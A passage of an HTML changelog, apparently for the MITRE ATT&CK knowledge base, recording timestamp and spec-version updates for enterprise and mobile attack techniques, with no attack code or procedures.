style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:48:07.391000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr></tbody></table></details><hr><h4>[T1497.002] Virtualization/Sandbox Evasion: User Activity Based Checks</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:52:22.149000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.007] Hide Artifacts: VBA Stomping</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:26:09.220000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr></tbody></table></details><hr><h4>[T1055.014] Process Injection: VDSO Hijacking</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:30:51.756000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1078] Valid Accounts</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:49:37.148000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.012] System Binary Proxy Execution: Verclsid</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:42:21.088000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.666000+00:00</td></tr></tbody></table></details><hr><h4>[T1125] Video Capture</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:56.077000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1673] Virtual Machine Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 21:24:32.155000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1584.003] Compromise Infrastructure: Virtual Private Server</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:40.055000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.627000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1583.003] Acquire Infrastructure: Virtual Private Server</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:59.607000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1497] Virtualization/Sandbox Evasion</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:52:12.932000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.672000+00:00</td></tr></tbody></table></details><hr><h4>[T1059.005] Command and Scripting Interpreter: Visual Basic</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:29.678000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1595.002] Active Scanning: Vulnerability Scanning</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:48.647000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1600] Weaken Encryption</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.046000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1056.003] Input Capture: Web Portal Capture</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:54.254000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1071.001] Application Layer Protocol: Web Protocols</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:29.591000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T1102] Web Service</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:02.831000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.672000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1583.006] Acquire Infrastructure: Web Services</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:04.554000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.694000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1550.004] Use Alternate Authentication Material: Web Session Cookie</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:48:02.590000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.714000+00:00</td></tr></tbody></table></details><hr><h4>[T1505.003] Server Software Component: Web Shell</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:50.387000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1059.003] Command and Scripting Interpreter: Windows Command Shell</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:25.722000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1686.003] Disable or Modify System Firewall: Windows Host Firewall</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:39:19.227000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1047] Windows Management Instrumentation</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:19.670000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.619000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1222.001] File and Directory Permissions Modification: Windows Permissions</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:51:17.272000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.625000+00:00</td></tr></tbody></table></details><hr><h4>[T1543.003] Create or Modify System Process: Windows Service</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:48:07.774000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1683.001] Generate Content: Written Content</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 15:34:25.836000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr></tbody></table></details><hr><h4>[T1220] XSL Script Processing</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:53:58.559000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details></details><h3>mobile-attack</h3><details><summary>Patches</summary><hr><h4>[T1453] Abuse Accessibility Features</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-27 17:12:01.143000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1517] Access Notifications</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:40.140000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.627000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1636.005] Protected User Data: Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-17 15:21:58.225000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr></tbody></table></details><hr><h4>[T1429] Audio Capture</h4><p><b>Current version</b>: 3.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:52.833000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.637000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1481.002] Web Service: Bidirectional Communication</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:06.929000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1624.001] Event Triggered Execution: Broadcast Receivers</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:39.155000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.626000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1616] Call Control</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:38.183000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.625000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1636.002] Protected User Data: Call Log</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:29.311000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1636.003] Protected User Data: Contact List</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:30.430000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1662] Data Destruction</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-27 21:09:27.288000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1533] Data from Local System</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:30.706000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1626.001] Abuse Elevation Control Mechanism: Device Administrator 